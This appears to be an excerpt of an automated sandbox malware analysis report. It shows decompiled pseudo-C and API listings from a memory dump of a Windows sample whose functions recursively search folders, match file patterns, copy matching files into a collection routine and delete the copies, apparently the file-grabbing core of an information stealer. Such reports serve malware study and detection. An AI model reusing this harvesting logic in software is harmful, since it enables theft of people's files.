0x004088db
0x004088e0
0x004088e0
0x00408bc2
0x00000000
0x00408bc2
0x00000000
0x00408bc7
0x00408bd5
0x00408bdb
0x00408bdb
0x00000000

APIs

wsprintfA.USER32 ref: 004087F9
FindFirstFileA.KERNEL32(?,?), ref: 00408810
StrCmpCA.SHLWAPI(?,00414010), ref: 00408836
StrCmpCA.SHLWAPI(?,00414014), ref: 0040884C
FindNextFileA.KERNEL32(000000FF,?), ref: 00408BD5
FindClose.KERNEL32(000000FF), ref: 00408BEA

Strings

%s\*, xrefs: 004087ED
%s\%s, xrefs: 00408866

Memory Dump Source

Source File: 00000017.00000002.412367036.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.412493181.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_EC9F.jbxd

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s$%s\*
API String ID: 180737720-2848263008
Opcode ID: 864204762c03cb812e489958dcffbbc39fef40720c2155e64fcd8f4357d5c54a
Instruction ID: 0b41a1abc190fb4bcf7a86ba3d7a33f51ad09bf1deba5e068821b47be1bcc9a2
Opcode Fuzzy Hash: 864204762c03cb812e489958dcffbbc39fef40720c2155e64fcd8f4357d5c54a
Instruction Fuzzy Hash: 6FD12EB2500109ABCB14DF94DD84EEB73BDAF8C704F04869DB609A3150EA74EA95CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00405E40, Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 215
filestringCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E00405E40(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, char* _a20, int _a24, intOrPtr _a28, int _a32, intOrPtr _a36) {
				char _v5004;
				char _v5268;
				void* _v5272;
				struct _WIN32_FIND_DATAA _v5596;
				char _v5860;
				char _v6124;
				int _v6128;
				char _v6132;
				void* _t76;
				int _t77;
				int _t79;
				int _t81;
				int _t85;
				void* _t89;
				int _t91;
				int _t102;
				int _t103;
				int _t104;
				int _t106;
				void* _t157;
				void* _t158;
				void* _t159;

				E004139B0(0x17f0, __ecx);
				wsprintfA( &_v5268, "%s\*");
				_t158 = _t157 + 0xc;
				_v5272 = FindFirstFileA( &_v5268,  &_v5596);
				E0040B720( &_v5004, 0x1388);
				_t76 =  *0x41aa24( &_v5004, _a36, _a16);
				if(_v5272 != 0xffffffff) {
					goto L2;
				} else {
					return _t76;
				}
				do {
					L2:
					_t77 =  *0x41aa4c( &(_v5596.cFileName), 0x414010);
					__eflags = _t77;
					if(_t77 == 0) {
						L4:
						goto L25;
					}
					_t81 =  *0x41aa4c( &(_v5596.cFileName), 0x414014);
					__eflags = _t81;
					if(_t81 != 0) {
						wsprintfA( &_v6124, "%s\%s");
						_t159 = _t158 + 0x10;
						_t85 =  *0x41aa4c(_a12, 0x41401a, _a16,  &(_v5596.cFileName));
						__eflags = _t85;
						if(_t85 != 0) {
							__eflags = _a32;
							if(_a32 == 0) {
								wsprintfA( &_v5860, "%s\\%s\\%s", _a4, _a12,  &(_v5596.cFileName));
								_t158 = _t159 + 0x14;
							} else {
								_push( &(_v5596.cFileName));
								_push(_a12);
								wsprintfA( &_v5860, "%s\%s");
								_t158 = _t159 + 0x10;
							}
						} else {
							__eflags = _a32;
							if(_a32 == 0) {
								_push( &(_v5596.cFileName));
								_push(_a4);
								wsprintfA( &_v5860, "%s\%s");
								_t158 = _t159 + 0x10;
							} else {
								wsprintfA( &_v5860, 0x414024,  &(_v5596.cFileName));
								_t158 = _t159 + 0xc;
							}
						}
						_t89 =  *0x41a908( &_v5004);
						__eflags = _t89 - 3;
						if(_t89 <= 3) {
							_t91 = PathMatchSpecA( &(_v5596.cFileName), _a20);
							__eflags = _t91;
							if(_t91 != 0) {
								CopyFileA( &_v6124,  &(_v5596.cFileName), 1);
								E004137C0(_a8,  &_v5860,  &(_v5596.cFileName));
								_t158 = _t158 + 0xc;
								DeleteFileA( &(_v5596.cFileName));
							}
							L23:
							__eflags = _a24;
							if(__eflags != 0) {
								E00405E40(_a4, __eflags, _a4, _a8,  &_v5860,  &_v6124, _a20, _a24, _a28, _a32, _a36);
								_t158 = _t158 + 0x24;
							}
							goto L25;
						}
						_t102 = E0040C090( &_v5004, ",",  &_v6132);
						_t158 = _t158 + 0xc;
						_v6128 = _t102;
						while(1) {
							__eflags = _v6128;
							if(_v6128 == 0) {
								break;
							}
							_t103 =  *0x41a990( &(_v5596.cFileName), _v6128, 0);
							__eflags = _t103;
							if(_t103 == 0) {
								_t106 = PathMatchSpecA( &(_v5596.cFileName), _a20);
								__eflags = _t106;
								if(_t106 != 0) {
									CopyFileA( &_v6124,  &(_v5596.cFileName), 1);
									E004137C0(_a8,  &_v5860,  &(_v5596.cFileName));
									_t158 = _t158 + 0xc;
									DeleteFileA( &(_v5596.cFileName));
								}
							}
							_t104 = E0040C090(0, ",",  &_v6132);
							_t158 = _t158 + 0xc;
							_v6128 = _t104;
						}
						goto L23;
					}
					goto L4;
					L25:
					_t79 = FindNextFileA(_v5272,  &_v5596);
					__eflags = _t79;
				} while (_t79 != 0);
				return FindClose(_v5272);
			}

0x00405e48
0x00405e5d
0x00405e63
0x00405e7a
0x00405e8c
0x00405e9c
0x00405ea9
0x00000000
0x00000000
0x00000000
0x00000000
0x00405eb0
0x00405eb0
0x00405ebc
0x00405ec2
0x00405ec4
0x00405edc
0x00000000
0x00405edc
0x00405ed2
0x00405ed8
0x00405eda
0x00405ef8
0x00405efe
0x00405f0a
0x00405f10
0x00405f12
0x00405f5a
0x00405f5e
0x00405f9d
0x00405fa3
0x00405f60
0x00405f66
0x00405f6a
0x00405f77
0x00405f7d
0x00405f7d
0x00405f14
0x00405f14
0x00405f18
0x00405f3e
0x00405f42
0x00405f4f
0x00405f55
0x00405f1a
0x00405f2d
0x00405f33
0x00405f33
0x00405f58
0x00405fad
0x00405fb3
0x00405fb6
0x00406084
0x0040608a
0x0040608c
0x0040609e
0x004060b6
0x004060bb
0x004060c5
0x004060c5
0x004060cb
0x004060cb
0x004060cf
0x004060fb
0x00406100
0x00406100
0x00000000
0x004060cf
0x00405fcf
0x00405fd4
0x00405fd7
0x00405fdd
0x00405fdd
0x00405fe4
0x00000000
0x00000000
0x00405ffa
0x00406000
0x00406002
0x0040600f
0x00406015
0x00406017
0x00406029
0x00406041
0x00406046
0x00406050
0x00406050
0x00406017
0x00406064
0x00406069
0x0040606c
0x0040606c
0x00000000
0x00406077
0x00000000
0x00406103
0x00406111
0x00406117
0x00406117
0x00000000

APIs

wsprintfA.USER32 ref: 00405E5D
FindFirstFileA.KERNEL32(?,?,?,00000000,?), ref: 00405E74
lstrcat.KERNEL32(?,?), ref: 00405E9C
StrCmpCA.SHLWAPI(?,00414010), ref: 00405EBC
StrCmpCA.SHLWAPI(?,00414014), ref: 00405ED2
FindNextFileA.KERNEL32(000000FF,?), ref: 00406111
FindClose.KERNEL32(000000FF), ref: 00406126

Strings

%s\*, xrefs: 00405E51
%s\%s\%s, xrefs: 00405F91
%s\%s, xrefs: 00405EEC, 00405F43, 00405F6B

Memory Dump Source

Source File: 00000017.00000002.412367036.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.412493181.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_EC9F.jbxd

Similarity

API ID: Find$File$CloseFirstNextlstrcatwsprintf
String ID: %s\%s$%s\%s\%s$%s\*
API String ID: 1125553467-1426491737
Opcode ID: da2c885b9076c81ca24cc3c87d12da24a82ebc38fc329cbfdd7a2e0dbf039061
Instruction ID: 0bc9b02d7ab3545e21e8315ee4c466327c2adae897de70d70c4ab632552244ce
Opcode Fuzzy Hash: da2c885b9076c81ca24cc3c87d12da24a82ebc38fc329cbfdd7a2e0dbf039061
Instruction Fuzzy Hash: A88174B5900208EFCB14DFA4DC44DEB73B8EF48745F4486A9F60A96180D7789B94CF56

Uniqueness

Uniqueness Score: -1.00%

Function 00409970, Relevance: 35.1, APIs: 19, Strings: 1, Instructions: 121fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 00409989
FindFirstFileA.KERNEL32(?,?), ref: 004099A0
StrCmpCA.SHLWAPI(?,00414010), ref: 004099C6
StrCmpCA.SHLWAPI(?,00414014), ref: 004099DC
FindNextFileA.KERNEL32(000000FF,?), ref: 00409B20
FindClose.KERNEL32(000000FF), ref: 00409B35

Strings

%s\*, xrefs: 0040997D

Memory Dump Source

Source File: 00000017.00000002.412367036.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.412493181.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_EC9F.jbxd

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\*
API String ID: 180737720-766152087
Opcode ID: d36557e83e60a98afa7e569db09bb73b01886f17925a8ce19d475cf2d8557a23
Instruction ID: f00fb7030c8b22b76076fdd7412de7885a7951318a5a6e6dd79535400c2c2ee4
Opcode Fuzzy Hash: d36557e83e60a98afa7e569db09bb73b01886f17925a8ce19d475cf2d8557a23
Instruction Fuzzy Hash: 544167B2510218ABCB10DFA0DD48EEB77B8BF4C705F04859AB20992151E778EB94CF5A

Uniqueness

Uniqueness Score: -1.00%

Function 02D28A30, Relevance: 31.8, APIs: 21, Instructions: 337fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 02D28A49
FindFirstFileA.KERNEL32(?,?), ref: 02D28A60
StrCmpCA.SHLWAPI(?,00414010), ref: 02D28A86
StrCmpCA.SHLWAPI(?,00414014), ref: 02D28A9C
FindNextFileA.KERNEL32(000000FF,?), ref: 02D28E25
FindClose.KERNEL32(000000FF), ref: 02D28E3A

Memory Dump Source

Source File: 00000017.00000002.412955259.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d20000_EC9F.jbxd

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID:
API String ID: 180737720-0
Opcode ID: 8860fb76c00992ec9b6090301a4dc91e227bf6d1901a6b14b4adba910f5443df
Instruction ID: 75fcb5df241652b2223025a70d40e8aa2768e2306d37dfc56ade943df206b205
Opcode Fuzzy Hash: 8860fb76c00992ec9b6090301a4dc91e227bf6d1901a6b14b4adba910f5443df
Instruction Fuzzy Hash: 40D12EB2500119ABCB14DF94DD84EEB73BDAF9C704F048698B609D3250EB34EA95CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00401280, Relevance: 31.6, APIs: 16, Strings: 2, Instructions: 134
fileCOMMON

Download Yara Rule

C-Code - Quality: 20%

			E00401280(intOrPtr _a4, intOrPtr _a8, char* _a12, intOrPtr _a16) {
				char _v268;
				void* _v272;
				struct _WIN32_FIND_DATAA _v596;
				char _v860;
				char _v1124;
				char _v1388;
				char _v1652;
				void* _t43;
				intOrPtr _t66;
				void* _t98;
				void* _t99;
				void* _t100;
				void* _t101;

				_push(_a8);
				wsprintfA( &_v268, "%s\*");
				_t99 = _t98 + 0xc;
				_t43 = FindFirstFileA( &_v268,  &_v596);
				_v272 = _t43;
				if(_v272 != 0xffffffff) {
					do {
						_push(0x414010);
						_push( &(_v596.cFileName));
						if( *0x41aa4c() == 0) {
							L4:
							goto L11;
						}
						_push(0x414014);
						_push( &(_v596.cFileName));
						if( *0x41aa4c() != 0) {
							_push( &(_v596.cFileName));
							_push(_a8);
							wsprintfA( &_v1124, "%s\%s");
							_t100 = _t99 + 0x10;
							_push(0x41401a);
							_push(_a4);
							if( *0x41aa4c() != 0) {
								_push( &(_v596.cFileName));
								_push(_a4);
								wsprintfA( &_v860, "%s\%s");
								_t101 = _t100 + 0x10;
							} else {
								wsprintfA( &_v860, 0x414024,  &(_v596.cFileName));
								_t101 = _t100 + 0xc;
							}
							if(PathMatchSpecA( &(_v596.cFileName), _a12) != 0) {
								E0040B720( &_v1652, 0x104);
								E0040B720( &_v1388, 0x104);
								 *0x41aa24( &_v1652, _a8);
								 *0x41aa24( &_v1652, 0x414018);
								 *0x41aa24( &_v1652,  &(_v596.cFileName));
								_t66 =  *0x41a5a4; // 0x2e46e68
								 *0x41aa24( &_v1388, _t66);
								 *0x41aa24( &_v1388,  &_v860);
								E004137C0(_a16,  &_v1388,  &_v1652);
								_t101 = _t101 + 0xc;
							}
							E00401280( &_v860,  &_v1124, _a12, _a16);
							_t99 = _t101 + 0x10;
							goto L11;
						}
						goto L4;
						L11:
					} while (FindNextFileA(_v272,  &_v596) != 0);
					return FindClose(_v272);
				}
				return _t43;
			}

0x0040128c
0x00401299
0x0040129f
0x004012b0
0x004012b6
0x004012c3
0x004012ca
0x004012ca
0x004012d5
0x004012de
0x004012f6
0x00000000
0x004012f6
0x004012e0
0x004012eb
0x004012f4
0x00401301
0x00401305
0x00401312
0x00401318
0x0040131b
0x00401323
0x0040132c
0x00401352
0x00401356
0x00401363
0x00401369
0x0040132e
0x00401341
0x00401347
0x00401347
0x0040137f
0x00401391
0x004013a2
0x004013b2
0x004013c4
0x004013d8
0x004013de
0x004013eb
0x004013ff
0x00401417
0x0040141c
0x0040141c
0x00401435
0x0040143a
0x00000000
0x0040143a
0x00000000
0x0040143d
0x00401451
0x00000000
0x00401460
0x00000000

APIs

wsprintfA.USER32 ref: 00401299
FindFirstFileA.KERNEL32(?,?), ref: 004012B0
StrCmpCA.SHLWAPI(?,00414010), ref: 004012D6
StrCmpCA.SHLWAPI(?,00414014), ref: 004012EC
FindNextFileA.KERNEL32(000000FF,?), ref: 0040144B
FindClose.KERNEL32(000000FF), ref: 00401460

Strings

%s\*, xrefs: 0040128D
%s\%s, xrefs: 00401306, 00401357

Memory Dump Source

Source File: 00000017.00000002.412367036.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.412493181.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_EC9F.jbxd

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s$%s\*
API String ID: 180737720-2848263008
Opcode ID: 9a946c6c1b585fb6ecffd09ad8bd87ccec9506f78aa8e12e69a80bbcdc18ab01
Instruction ID: 4cd9f1fc2f596726c4666f8bf9c741da0555b1e74a9e6087d7d803036aaf4599
Opcode Fuzzy Hash: 9a946c6c1b585fb6ecffd09ad8bd87ccec9506f78aa8e12e69a80bbcdc18ab01
Instruction Fuzzy Hash: 56518672500218ABCB10DFA0DD48EEA73B8BF4C705F0485A9B609A3150E779EB94CF69

Uniqueness

Uniqueness Score: -1.00%

Function 02D26090, Relevance: 30.2, APIs: 20, Instructions: 215filestringCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 02D260AD
FindFirstFileA.KERNEL32(?,?), ref: 02D260C4
lstrcat.KERNEL32(?,?), ref: 02D260EC
StrCmpCA.SHLWAPI(?,00414010), ref: 02D2610C
StrCmpCA.SHLWAPI(?,00414014), ref: 02D26122
FindNextFileA.KERNEL32(000000FF,?), ref: 02D26361
FindClose.KERNEL32(000000FF), ref: 02D26376

Memory Dump Source

Source File: 00000017.00000002.412955259.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d20000_EC9F.jbxd

Similarity

API ID: Find$File$CloseFirstNextlstrcatwsprintf
String ID:
API String ID: 1125553467-0
Opcode ID: bd6139f9ed7005472522956e30392e0ae32b38ee30a9d7aa607009e957b67d75
Instruction ID: 24151333223537122ed61df7a869d626b9d7088597b9910944c9020fd422e0f4
Opcode Fuzzy Hash: bd6139f9ed7005472522956e30392e0ae32b38ee30a9d7aa607009e957b67d75
Instruction Fuzzy Hash: 6F8163B5900218AFCB10DFA4CC44EEA73BCEF88745F4486D9F50A96140E774EA98CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 02D29BC0, Relevance: 28.6, APIs: 19, Instructions: 121fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 02D29BD9
FindFirstFileA.KERNEL32(?,?), ref: 02D29BF0
StrCmpCA.SHLWAPI(?,00414010), ref: 02D29C16
StrCmpCA.SHLWAPI(?,00414014), ref: 02D29C2C
FindNextFileA.KERNEL32(000000FF,?), ref: 02D29D70
FindClose.KERNEL32(000000FF), ref: 02D29D85

Memory Dump Source

Source File: 00000017.00000002.412955259.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d20000_EC9F.jbxd

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID:
API String ID: 180737720-0
Opcode ID: 9e7665e2acc2ddac78455e199e4a0fb3c3545ab69be18fa56164ce7ddbd4b7ab
Instruction ID: 00bef479397e367c37a487d27b29629b411df1030e95fcd5e544b5e0c9b83d7d
Opcode Fuzzy Hash: 9e7665e2acc2ddac78455e199e4a0fb3c3545ab69be18fa56164ce7ddbd4b7ab
Instruction Fuzzy Hash: 404167B2510218ABCB20DFA0DD48EEA77B8FF5C705F048599F20592150E778EB98CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00401090, Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 95fileCOMMON

Download Yara Rule

APIs

SetCurrentDirectoryA.KERNEL32(?), ref: 0040109D
wsprintfA.USER32 ref: 004010B7
FindFirstFileA.KERNEL32(?,?), ref: 004010CE
StrCmpCA.SHLWAPI(?,00414010), ref: 004010F4
StrCmpCA.SHLWAPI(?,00414014), ref: 0040110A
FindNextFileA.KERNEL32(000000FF,?), ref: 004011D3
FindClose.KERNEL32(000000FF), ref: 004011E8

Strings

%s\%s, xrefs: 004010AB

Memory Dump Source

Source File: 00000017.00000002.412367036.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.412493181.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_EC9F.jbxd

Similarity

API ID: Find$File$CloseCurrentDirectoryFirstNextwsprintf
String ID: %s\%s
API String ID: 2809309208-4073750446
Opcode ID: f0159c76561ba8365bb9aa6ad5d25ded7c9edc9d81d80b2b2d7af7a0a2787976
Instruction ID: 7ffd25992613dc01ae9c6896dea76ef306beac36bf0277a1da173af701ae58c0
Opcode Fuzzy Hash: f0159c76561ba8365bb9aa6ad5d25ded7c9edc9d81d80b2b2d7af7a0a2787976
Instruction Fuzzy Hash: C63177B6500218ABCB14DFE0DD88EEA77BCAF4C705F0085AAB609A2150DB78D794CF59

Uniqueness

Uniqueness Score: -1.00%

Function 02D214D0, Relevance: 24.1, APIs: 16, Instructions: 134fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 02D214E9
FindFirstFileA.KERNEL32(?,?), ref: 02D21500
StrCmpCA.SHLWAPI(?,00414010), ref: 02D21526
StrCmpCA.SHLWAPI(?,00414014), ref: 02D2153C
FindNextFileA.KERNEL32(000000FF,?), ref: 02D2169B
FindClose.KERNEL32(000000FF), ref: 02D216B0

Memory Dump Source

Source File: 00000017.00000002.412955259.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d20000_EC9F.jbxd

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID:
API String ID: 180737720-0
Opcode ID: 712d8f00420b4f24734ea6e850c51c9534c6fb7a651bca6c9d3a2b61a6e8218a
Instruction ID: 2a64443d79fe081d765e438047dbcb42097c43d370dfc3a4d2a7bc4728b81770
Opcode Fuzzy Hash: 712d8f00420b4f24734ea6e850c51c9534c6fb7a651bca6c9d3a2b61a6e8218a
Instruction Fuzzy Hash: D25182B2900218ABCB10DFA0DD48EEA73BCFF48705F048599B60D92141E775EB98CF65

Uniqueness

Uniqueness Score: -1.00%

Function 004096E0, Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 213
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E004096E0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28) {
				char _v268;
				void* _v272;
				struct _WIN32_FIND_DATAA _v596;
				char _v860;
				void* _t76;
				signed int _t77;
				int _t79;
				signed int _t81;
				intOrPtr _t84;
				signed int _t86;
				signed int _t88;
				intOrPtr _t89;
				signed int _t90;
				intOrPtr _t122;
				intOrPtr _t146;
				void* _t166;
				void* _t167;

				_push(_a8);
				wsprintfA( &_v268, "%s\*");
				_t167 = _t166 + 0xc;
				_t76 = FindFirstFileA( &_v268,  &_v596);
				_v272 = _t76;
				if(_v272 != 0xffffffff) {
					goto L2;
				} else {
					return _t76;
				}
				do {
					L2:
					_t77 =  *0x41aa4c( &(_v596.cFileName), 0x414010);
					__eflags = _t77;
					if(_t77 == 0) {
						L4:
						goto L19;
					}
					_t81 =  *0x41aa4c( &(_v596.cFileName), 0x414014);
					__eflags = _t81;
					if(_t81 != 0) {
						wsprintfA( &_v860, "%s\%s");
						_t167 = _t167 + 0x10;
						_t84 =  *0x41a4cc; // 0x2e4a270
						__eflags =  *0x41aa4c( &(_v596.cFileName), _t84, _a8,  &(_v596.cFileName));
						if(__eflags != 0) {
							_t122 =  *0x41a030; // 0x2e4b120
							_t86 =  *0x41aa4c( &(_v596.cFileName), _t122);
							__eflags = _t86;
							if(_t86 != 0) {
								_t146 =  *0x41a7e4; // 0x2e4a408
								_t88 =  *0x41aa4c( &(_v596.cFileName), _t146);
								__eflags = _t88;
								if(_t88 != 0) {
									_t89 =  *0x41a0d4; // 0x2e4a288
									_t90 =  *0x41aa4c( &(_v596.cFileName), _t89);
									__eflags = _t90;
									if(_t90 != 0) {
										__eflags = _v596.dwFileAttributes & 0x00000010;
										if((_v596.dwFileAttributes & 0x00000010) != 0) {
											E004096E0( &(_v596.cFileName),  &_v860, _a12, _a16, _a20, _a24, _a28);
											_t167 = _t167 + 0x1c;
										}
									} else {
										__eflags = _a28;
										if(__eflags != 0) {
											E00409590(_a4, __eflags,  &_v860, _a4, _a12, _a16);
											_t167 = _t167 + 0x10;
										}
										E004096E0( &(_v596.cFileName),  &_v860, _a12, _a16, _a20, _a24, _a28);
										_t167 = _t167 + 0x1c;
									}
								} else {
									_push(_a16);
									E00409060(_a4, _a4, _a12, _a8);
									E004096E0( &(_v596.cFileName),  &_v860, _a12, _a16, _a20, _a24, _a28);
									_t167 = _t167 + 0x2c;
								}
							} else {
								__eflags = _a24;
								if(__eflags != 0) {
									E00409400(_a12, __eflags,  &_v860, _a4, _a12, _a16);
									_t167 = _t167 + 0x10;
								}
								E004096E0( &(_v596.cFileName),  &_v860, _a12, _a16, _a20, _a24, _a28);
								_t167 = _t167 + 0x1c;
							}
						} else {
							E00408C00(_a4, __eflags,  &_v860, _a4, _a12, _a16);
							E004096E0( &(_v596.cFileName),  &_v860, _a12, _a16, _a20, _a24, _a28);
							_t167 = _t167 + 0x2c;
						}
						goto L19;
					}
					goto L4;
					L19:
					_t79 = FindNextFileA(_v272,  &_v596);
					__eflags = _t79;
				} while (_t79 != 0);
				return FindClose(_v272);
			}

0x004096ec
0x004096f9
0x004096ff
0x00409710
0x00409716
0x00409723
0x00000000
0x00000000
0x00000000
0x00000000
0x0040972a
0x0040972a
0x00409736
0x0040973c
0x0040973e
0x00409756
0x00000000
0x00409756
0x0040974c
0x00409752
0x00409754
0x00409772
0x00409778
0x0040977b
0x0040978e
0x00409790
0x004097dc
0x004097ea
0x004097f0
0x004097f2
0x00409844
0x00409852
0x00409858
0x0040985a
0x004098a3
0x004098b0
0x004098b6
0x004098b8
0x0040990d
0x00409910
0x00409934
0x00409939
0x00409939
0x004098ba
0x004098ba
0x004098be
0x004098d3
0x004098d8
0x004098d8
0x004098fd
0x00409902
0x00409902
0x0040985c
0x0040985f
0x0040986c
0x00409896
0x0040989b
0x0040989b
0x004097f4
0x004097f4
0x004097f8
0x0040980d
0x00409812
0x00409812
0x00409837
0x0040983c
0x0040983c
0x00409792
0x004097a5
0x004097cf
0x004097d4
0x004097d4
0x00000000
0x00409790
0x00000000
0x0040993c
0x0040994a
0x00409950
0x00409950
0x00000000

APIs

wsprintfA.USER32 ref: 004096F9
FindFirstFileA.KERNEL32(?,?), ref: 00409710
StrCmpCA.SHLWAPI(?,00414010), ref: 00409736
StrCmpCA.SHLWAPI(?,00414014), ref: 0040974C
FindNextFileA.KERNEL32(000000FF,?), ref: 0040994A
FindClose.KERNEL32(000000FF), ref: 0040995F

Strings

%s\*, xrefs: 004096ED
%s\%s, xrefs: 00409766

Memory Dump Source

Source File: 00000017.00000002.412367036.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.412493181.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_EC9F.jbxd

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s$%s\*
API String ID: 180737720-2848263008
Opcode ID: 5368e8b786ea03139a50106a3f224b7a5846eb6f2b8c7c17a6f5a730a81b7aca
Instruction ID: 1519fd6f9f5c0b483e7b6c5176f88e596ecfd98fd3e89c67d3b1837449ae925a
Opcode Fuzzy Hash: 5368e8b786ea03139a50106a3f224b7a5846eb6f2b8c7c17a6f5a730a81b7aca
Instruction Fuzzy Hash: FE810EB2510109ABCB14DF99DC84EEB73BDAF8C700F04855DBA09A3251E638EE55CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00409B40, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 183
fileCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E00409B40(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				char _v268;
				void* _v272;
				struct _WIN32_FIND_DATAA _v596;
				char _v860;
				char _v1124;
				char _v1388;
				char _v1652;
				char _v1916;
				char _v2180;
				void* _t57;
				CHAR* _t64;
				CHAR* _t66;
				void* _t78;
				void* _t80;
				void* _t82;
				CHAR* _t106;
				CHAR* _t107;
				CHAR* _t121;
				CHAR* _t122;
				void* _t135;
				void* _t136;
				void* _t143;
				void* _t144;

				wsprintfA( &_v268, "%s\\*.*", _a12);
				_t136 = _t135 + 0xc;
				_t57 = FindFirstFileA( &_v268,  &_v596);
				_v272 = _t57;
				if(_v272 != 0xffffffff) {
					do {
						_push(0x414010);
						_push( &(_v596.cFileName));
						if( *0x41aa4c() == 0) {
							L4:
							goto L12;
						}
						_push(0x414014);
						_push( &(_v596.cFileName));
						if( *0x41aa4c() != 0) {
							_t64 =  *0x41a39c; // 0x2e4c968
							wsprintfA( &_v1124, _t64, _a12,  &(_v596.cFileName), _a4);
							_t66 =  *0x41a6d4; // 0x2e4bc08
							wsprintfA( &_v1652, _t66,  &_v1124);
							_t121 =  *0x41a59c; // 0x2e4c9c8
							wsprintfA( &_v1388, _t121, _a12,  &(_v596.cFileName), _a4);
							_t122 =  *0x41a6d4; // 0x2e4bc08
							wsprintfA( &_v2180, _t122,  &_v1388);
							_t106 =  *0x41a1d8; // 0x2e2e908
							wsprintfA( &_v1916, _t106, _a12,  &(_v596.cFileName), _a4);
							_t107 =  *0x41a6d4; // 0x2e4bc08
							wsprintfA( &_v860, _t107,  &_v1916);
							_t78 = E0040BB70( &_v1652);
							_t143 = _t136 + 0x64;
							if(_t78 != 0) {
								E00409970( &_v1124, _a8, _a16,  &(_v596.cFileName), _a20);
								_t143 = _t143 + 0x14;
							}
							_t80 = E0040BB70( &_v2180);
							_t144 = _t143 + 4;
							if(_t80 != 0) {
								E00409970( &_v1388, _a8, _a16,  &(_v596.cFileName), _a20);
								_t144 = _t144 + 0x14;
							}
							_t82 = E0040BB70( &_v860);
							_t136 = _t144 + 4;
							if(_t82 != 0) {
								E00409970( &_v1916, _a8, _a16,  &(_v596.cFileName), _a20);
								_t136 = _t136 + 0x14;
							}
							E0040B720( &_v1124, 0x104);
							E0040B720( &_v1652, 0x104);
							E0040B720( &_v1388, 0x104);
							E0040B720( &_v2180, 0x104);
							E0040B720( &_v1916, 0x104);
							E0040B720( &_v860, 0x104);
							goto L12;
						}
						goto L4;
						L12:
					} while (FindNextFileA(_v272,  &_v596) != 0);
					return FindClose(_v272);
				}
				return _t57;
			}

0x00409b59
0x00409b5f
0x00409b70
0x00409b76
0x00409b83
0x00409b8a
0x00409b8a
0x00409b95
0x00409b9e
0x00409bb6
0x00000000
0x00409bb6
0x00409ba0
0x00409bab
0x00409bb4
0x00409bca
0x00409bd7
0x00409be7
0x00409bf4
0x00409c0c
0x00409c1a
0x00409c2a
0x00409c38
0x00409c50
0x00409c5e
0x00409c6e
0x00409c7c
0x00409c8c
0x00409c91
0x00409c96
0x00409cb2
0x00409cb7
0x00409cb7
0x00409cc1
0x00409cc6
0x00409ccb
0x00409ce7
0x00409cec
0x00409cec
0x00409cf6
0x00409cfb
0x00409d00
0x00409d1c
0x00409d21
0x00409d21
0x00409d30
0x00409d41
0x00409d52
0x00409d63
0x00409d74
0x00409d85
0x00000000
0x00409d85
0x00000000
0x00409d8a
0x00409d9e
0x00000000
0x00409dad
0x00000000

APIs

wsprintfA.USER32 ref: 00409B59
FindFirstFileA.KERNEL32(?,?), ref: 00409B70
StrCmpCA.SHLWAPI(?,00414010), ref: 00409B96
StrCmpCA.SHLWAPI(?,00414014), ref: 00409BAC
FindNextFileA.KERNEL32(000000FF,?), ref: 00409D98
FindClose.KERNEL32(000000FF), ref: 00409DAD

Strings

